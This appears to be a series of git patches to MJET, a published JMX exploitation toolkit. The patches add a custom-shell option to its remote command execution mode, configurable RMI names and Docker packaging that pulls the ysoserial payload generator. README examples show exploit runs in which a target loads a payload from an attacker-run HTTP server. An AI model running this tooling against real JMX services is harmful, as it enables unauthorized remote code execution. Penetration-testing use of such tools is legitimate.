From d0a6c0670a56d0d9a56a6bf6aa5631c1b9bf7a01 Mon Sep 17 00:00:00 2001
From: Moritz
Date: Tue, 1 Jun 2021 10:55:21 +0200
Subject: [PATCH 01/10] Bug Fix - Shell Mode works now
---
 mjet.py | 18 +++++++++++-------
 1 file changed, 11 insertions(+), 7 deletions(-)
diff --git a/mjet.py b/mjet.py
index 2cdfb34..d3b4a98 100644
--- a/mjet.py
+++ b/mjet.py
@@ -65,7 +65,7 @@ def jxmrmi_url(args):
 from javax.management.remote import JMXServiceURL
 jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" +
- args.targetHost + ":" + args.targetPort + "/jmxrmi")
+ args.targetHost + ":" + args.targetPort + "/" + args.rmiObjectName)
 return jmx_url
@@ -291,11 +291,11 @@ def changePassword(password, newpass, bean_server):
 def commandMode(args):
 bean_server = connectToJMX(args)
- executeCommand(args.password, args.cmd, bean_server)
+ executeCommand(args.password, args.cmd, bean_server, args.shell)
 print "[+] Done"
-def executeCommand(password, cmd, bean_server):
+def executeCommand(password, cmd, bean_server, shell):
 # Payload execution
 # Load the Payload MLet and invoke a method on it
 mlet_bean = bean_server.getObjectInstance(
@@ -303,14 +303,16 @@ def executeCommand(password, cmd, bean_server):
 print "[+] Loaded " + str(mlet_bean.getClassName())
 print "[+] Executing command: " + cmd
- inv_array1 = jarray.zeros(2, Object)
+ inv_array1 = jarray.zeros(3, Object)
 inv_array1[0] = password
 inv_array1[1] = cmd
+ inv_array1[2] = shell
- inv_array2 = jarray.zeros(2, String)
+ inv_array2 = jarray.zeros(3, String)
 inv_array2[0] = String.canonicalName
 inv_array2[1] = String.canonicalName
-
+ inv_array2[2] = String.canonicalName
+
 resource = bean_server.invoke(
 mlet_bean.getObjectName(), "runCMD", inv_array1, inv_array2)
@@ -378,7 +380,7 @@ def startShell(password, bean_server):
 if cmd == 'exit_shell':
 in_command_loop = False
 else:
- executeCommand(password, cmd, bean_server)
+ executeCommand(password, cmd, bean_server, args.shell)
 ### /SHELL MODE ### 
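Review bot: The new `shell` parameter of `executeCommand` is mandatory while `--shell` has no default, so a plain command-mode run now forwards `None` (a Java null) in `inv_array1[2]` to the MLet's `runCMD`; whether the MLet tolerates a null third argument is not visible here, and if it does not, command mode without `--shell` stops working. The same concern applies to the `inv_array1[2] = shell` line in the `@@ -303` hunk. Making the parameter optional keeps existing callers working, `def executeCommand(password, cmd, bean_server, shell=None):`, and the function's header comment should state that `shell` is handed to `runCMD` unchanged. `executeCommand`'s body continues past the end of both hunks.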
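Review bot: `args.shell` is referenced inside `startShell(password, bean_server)`, which has no `args` parameter; unless `args` is a module-level global (not visible in this hunk) this line raises `NameError` on the first command entered in shell mode, the very mode the commit title says it fixes. Threading the value through avoids the dependency on a global: `def startShell(password, bean_server, shell=None):` and `executeCommand(password, cmd, bean_server, shell)`, with the caller outside the hunk passing `args.shell`. The command loop that contains this line starts before the hunk.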
@@ -576,6 +578,8 @@ def arg_cve_2016_3427_mode(args):
 parser.add_argument('--jmxpassword', help='remote JMX password')
 parser.add_argument('--jmxmp', action='store_true', help='Use JMX Message Protocol')
+parser.add_argument('--shell', help='run with custom shell')
+parser.add_argument('--rmiObjectName', help='RMI name of the JMX endpoint', default='jmxrmi')
 parser.add_argument('--localhost_bypass', default=None, dest="localhost_bypass_port",
From c2419d31e57d8ebcaf0c3c1de1b6bf5d2eb626e5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch?=
Date: Tue, 1 Jun 2021 11:02:08 +0200
Subject: [PATCH 02/10] Update README.md Fixing small bugs with mode/password settings
---
 README.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index e397ba1..2272300 100644
--- a/README.md
+++ b/README.md
@@ -19,7 +19,7 @@ information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) a
 MJET implements a CLI interface (using [argparse](https://docs.python.org/3/library/argparse.html)):
 ```
-jython mjet.py targetHost targetPort password MODE (modeOptions)
+jython mjet.py targetHost targetPort MODE password (modeOptions)
 ```
 Where
@@ -97,7 +97,7 @@ h0ng10@rocksteady ~/w/mjet>
 Installation with JMX credentials (also needs a weak configuration of the server):
 ```
-h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
+h0ng10@rocksteady:~/mjet$ jython mjet.py 192.168.11.136 9991 install super_secret http://192.168.11.132:8000 8000 --jmxrole JMXUSER --jmxpassword JMXPASSWORD
 mJET - MOGWAI LABS JMX Exploitation Toolkit
 =======================================
 [+] Starting webserver at port 8000
From 9188dea8a0180bf866dcf1119ee10f60e5a2a215 Mon Sep 17 00:00:00 2001
From: h0ng10
Date: Wed, 2 Jun 2021 00:50:21 +0200
Subject: [PATCH 03/10] Updating contributions
---
 README.md | 2 ++
 1 file changed, 2 insertions(+)
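Review bot: The help text for `--shell` does not say what the value is or where it ends up: the string is forwarded verbatim as the third argument of the MLet's `runCMD` (the `inv_array1[2] = shell` change earlier in this patch), and when the flag is omitted the forwarded value is `None`. Spelling both out in the argparse definition saves the next reader a trip through `executeCommand`, e.g. `parser.add_argument('--shell', default=None, help='shell used by the payload to run the command; passed through to runCMD unchanged (default: none)')`. `--rmiObjectName` is fine as written; its `default='jmxrmi'` matches the path that was previously hard-coded in `jxmrmi_url`.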
diff --git a/README.md b/README.md
index 2272300..75196f2 100644
--- a/README.md
+++ b/README.md
@@ -424,6 +424,8 @@ Feel free to contribute.
 * **Arnim Rupp** - *Authentication support*
 * **Sebastian Kindler** - *Deserialization support*
 * **Karsten Zeides** - *JMX Message Protocol support, localhost bypass* [zeides](https://github.com/zeides)
+* **g60ocR** - *Docker file* [g60ocR](https://github.com/g60ocR)
+* **Morn98** - *Shell and RMI selection* [Morn98](https://github.com/Morn98))
 See also the list of [contributors](https://github.com/mogwailabs/sjet/graphs/contributors) who participated in this project.
From 34954677dce273f377a15df1b373104e6ee55891 Mon Sep 17 00:00:00 2001
From: h0ng10
Date: Wed, 2 Jun 2021 00:52:01 +0200
Subject: [PATCH 04/10] Improved Dockerfile
---
 Dockerfile | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/Dockerfile b/Dockerfile
index 4a227df..fdde5b1 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,9 +1,10 @@
 FROM ubuntu:latest
 ENV TZ=Europe/Stockholm
 RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
-RUN apt-get update && apt-get install -y jython wget git && rm -rf /var/lib/apt/lists/*
+RUN apt-get update && apt-get install -y default-jdk wget git && rm -rf /var/lib/apt/lists/*
 COPY . /app
-RUN wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
+RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \
+ && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
 EXPOSE 8000
 WORKDIR /app
-ENTRYPOINT ["jython", "mjet.py"]
+ENTRYPOINT ["tail", "-f", "/dev/null"]
From fabcbe2ce9926f0499eeb77c5aa1529eba22522b Mon Sep 17 00:00:00 2001
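Review bot: The Jython jar that becomes the interpreter for everything this image runs is fetched over plain `http://` from search.maven.org with no integrity check, so a tampered response anywhere on the network path, or a changed mirror, silently replaces the runtime at build time. Use `https://` and pin a digest: `RUN wget "https://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O /app/jython-standalone-2.7.0.jar \` followed by `&& echo "<SHA256_OF_JYTHON_JAR>  /app/jython-standalone-2.7.0.jar" | sha256sum -c - \`; the ysoserial `master-SNAPSHOT` artifact on the next line is likewise an unpinned, moving download and deserves the same treatment. Note also that `-O app/jython-standalone-2.7.0.jar` is a relative path that only lands in `/app` because `WORKDIR /app` comes later and the working directory is still `/`; writing `/app/` as the ysoserial line does removes that dependency on instruction order. Both download lines are carried over unchanged into the Dockerfile hunk of patch 06.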
From: Timo Mueller
Date: Wed, 30 Jun 2021 22:47:15 +0200
Subject: [PATCH 05/10] Dockerfile entryppoint improvement
---
 Dockerfile | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/Dockerfile b/Dockerfile
index fdde5b1..233cdb3 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -7,4 +7,5 @@ RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-stand
 && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
 EXPOSE 8000
 WORKDIR /app
-ENTRYPOINT ["tail", "-f", "/dev/null"]
+ENTRYPOINT ["java", "-jar", "jython-standalone-2.7.0.jar", "mjet.py"]
+CMD ["-h"]
From 30befb70eb5a1caf41bc3d58b005e448cc60d783 Mon Sep 17 00:00:00 2001
From: Timo Mueller
Date: Wed, 30 Jun 2021 23:13:33 +0200
Subject: [PATCH 06/10] Reduced docker image size
---
 Dockerfile | 3 +--
 README.md | 13 +++++++++++++
 2 files changed, 14 insertions(+), 2 deletions(-)
diff --git a/Dockerfile b/Dockerfile
index 233cdb3..cc39073 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,7 +1,6 @@
-FROM ubuntu:latest
+FROM openjdk:13-alpine
 ENV TZ=Europe/Stockholm
 RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
-RUN apt-get update && apt-get install -y default-jdk wget git && rm -rf /var/lib/apt/lists/*
 COPY . /app
 RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \
 && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
diff --git a/README.md b/README.md
index 75196f2..f694030 100644
--- a/README.md
+++ b/README.md 
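Review bot: After switching the base to `openjdk:13-alpine`, the retained `RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime` most likely creates a dangling symlink, because Alpine-based images generally do not ship `tzdata` and `ln -s` does not check that its target exists; the build still succeeds, so the timezone setting silently has no effect. Either install the package before the link, `RUN apk add --no-cache tzdata`, or drop the `ENV TZ` and `ln` lines if the timezone is not needed by the tool. Whether the base image actually contains `/usr/share/zoneinfo` is an inference; the hunk itself does not show the image contents.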
@@ -412,6 +412,19 @@ $
 Reference: https://www.optiv.com/blog/exploiting-jmx-rmi
+### Docker
+
+Build and run the docker image
+
+```bash
+# Build
+docker build -t mjet .
+# Run Help
+docker run mjet
+# Exploit example
+docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
+```
+
 ## Contributing
 Feel free to contribute.
From 28d664d42958f8c153dd0ca13658646e4df62490 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Timo=20M=C3=BCller?=
Date: Wed, 30 Jun 2021 23:29:46 +0200
Subject: [PATCH 07/10] Update README.md
---
 README.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index f694030..490ca4c 100644
--- a/README.md
+++ b/README.md
@@ -425,6 +425,8 @@ docker run mjet
 docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
 ```
+By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!
+
 ## Contributing
 Feel free to contribute.
From a4f4672ebbad07b9fc07127ee30951ffea2efc00 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Timo=20M=C3=BCller?=
Date: Wed, 30 Jun 2021 23:30:43 +0200
Subject: [PATCH 08/10] Update README.md
---
 README.md | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/README.md b/README.md
index 490ca4c..df24c53 100644
--- a/README.md
+++ b/README.md
@@ -423,6 +423,8 @@ docker build -t mjet .
 docker run mjet
 # Exploit example
 docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
+# Run Interactive into shell
+docker run --entrypoint /bin/sh -it mjet
 ```
 By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!
From 11d3265bd0526687b1e3a7e1709f22c14e3c5b16 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Timo=20M=C3=BCller?=
Date: Fri, 27 Aug 2021 10:39:31 +0200
Subject: [PATCH 09/10] Downgrade of the openjdk version Alpine-13 was failing during the ysoserial payload generation
---
 Dockerfile | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Dockerfile b/Dockerfile
index cc39073..e5c63f2 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,4 +1,4 @@
-FROM openjdk:13-alpine
+FROM openjdk:8-alpine
 ENV TZ=Europe/Stockholm
 RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
 COPY . /app
From c85ba1ede23ae723604d26fe621ec576abca9785 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Hans-Martin=20M=C3=BCnch?=
Date: Mon, 13 Mar 2023 10:09:29 +0100
Subject: [PATCH 10/10] Update README.md Adding "closed" message
---
 README.md | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index df24c53..7786474 100644
--- a/README.md
+++ b/README.md
@@ -4,10 +4,13 @@ MOGWAI LABS JMX Exploitation Toolkit
 MJET is a fork of [sjet](https://github.com/siberas/sjet/), which was developed by siberas but is no longer actively maintained. MJET is maintained by the MOGWAI LABS team which also provided most of the original sjet codebase.
-
 MJET allows an easy exploitation of insecure configured JMX services. Additional background information can be found [here](https://www.optiv.com/blog/exploiting-jmx-rmi) and [here](https://www.owasp.org/images/c/c1/JMX_-_Java_Management_Extensions_-_Hans-Martin_Muench.pdf).
+## !!! Important: This project is no longer maintained
+This repository is **no longer activly maintained**. We recommend using [qtcs beanshooter](https://github.com/qtc-de/beanshooter) instead.
+
+
 ## Prerequisites
 * [Jython 2.7](https://www.jython.org/)